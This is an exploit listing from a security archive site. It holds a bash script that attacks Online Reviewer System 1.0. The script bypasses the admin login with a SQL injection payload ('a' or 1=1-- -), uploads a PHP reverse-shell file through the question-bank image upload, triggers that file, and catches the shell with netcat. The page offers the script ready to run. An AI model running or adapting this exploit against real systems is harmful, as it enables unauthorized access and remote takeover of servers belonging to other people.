what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Online Reviewer System 1.0 SQL Injection / Shell Upload

Online Reviewer System 1.0 SQL Injection / Shell Upload
Posted Feb 1, 2021
Authored by Richard Jones

Online Reviewer System version 1.0 remote shell upload exploit that also leverages a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, shell, sql injection
SHA-256 | c27ceecbccfe8bf7fc03cb26477fb8dcd6de73f5604921deb0e4440389300d65

Online Reviewer System 1.0 SQL Injection / Shell Upload

Change Mirror Download
#!/bin/bash
# Exploit Title: Online Reviewer System (PHPPDO) - RCE & ADMIN BYPASS
# Exploit Author: Richard Jones
# Date: 2021-01-31
# Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12937&title=Online+Reviewer+System+Using+PHP%2FPDO+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34


RS='\033[0m'
R='\033[0;31m'
G='\033[0;32m'
LB='\033[1;34m'
CY='\033[0;36m'
W='\033[1;73m'

printf "${G} ________ .__ .__ __________ .__ ${RS} \n"
printf "${G} \_____ \ ____ | | |__| ____ ____\______ \ _______ _|__| ______ _ __ ${RS} \n"
printf "${G} / | \ / \| | | |/ \_/ __ \| _// __ \ \/ / |/ __ \ \/ \/ / ${RS} \n"
printf "${G} / | \ | \ |_| | | \ ___/| | \ ___/\ /| \ ___/\ / ${RS} \n"
printf "${G} \_______ /___| /____/__|___| /\___ >____|_ /\___ >\_/ |__|\___ >\/\_/ ${RS} \n"
printf "${G} \/ \/ \/ \/ \/ \/ \/ ${RS} \n"
printf "${G} Created by: Ricard Jones ${RS}"

if [ ${#@} -lt 3 ]; then
echo -e "\nUsage: ./onlinereviewer web-ip reverse-shell-file rev-port"
echo "Eg: ./onlinereviewer 10.10.10.10 shell.php rev-port"
exit 1;
fi

COOKIES="cookies.txt"
#login bypass
echo -e "\n[+] Running login bypass and trying for reverse shell..."
curl -c $COOKIES http://$1/reviewer/login/ -X POST -d "username=a%27+or+1%3D1--+-&password=a%27+or+1%3D1--+-&btn-login=Log+In" &>/dev/null
printf "${G}[+] Logged in, Sending payload ${RS}"
(sleep 3;curl -b $COOKIES "http://$1/reviewer/system/system/admins/assessments/databank/btn_functions.php?action=add" -X POST -F "difficulty_id=1" \
-F "test_desc=CIVIL ENGINEERING" -F "test_subject=Mathematics, Surveying and Transportation Engineering" -F "description=a" -F "option_a=a" -F "option_b=a" \
-F "option_c=a" -F "option_d=a" -F "answer=A" -F "personImage=@$2" -F "btnAddQuestion=Save" &>/dev/null) &
BASENAME=$2
FILENAME=${BASENAME##*/}
echo $BASENAME
(sleep 5; echo "[+] Calling shell, wait a few moments";sleep 6; curl -b $COOKIES "http://$1//reviewer/system/system/admins/assessments/databank/files/$FILENAME") &
rm $COOKIES
nc -lnvp $3
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close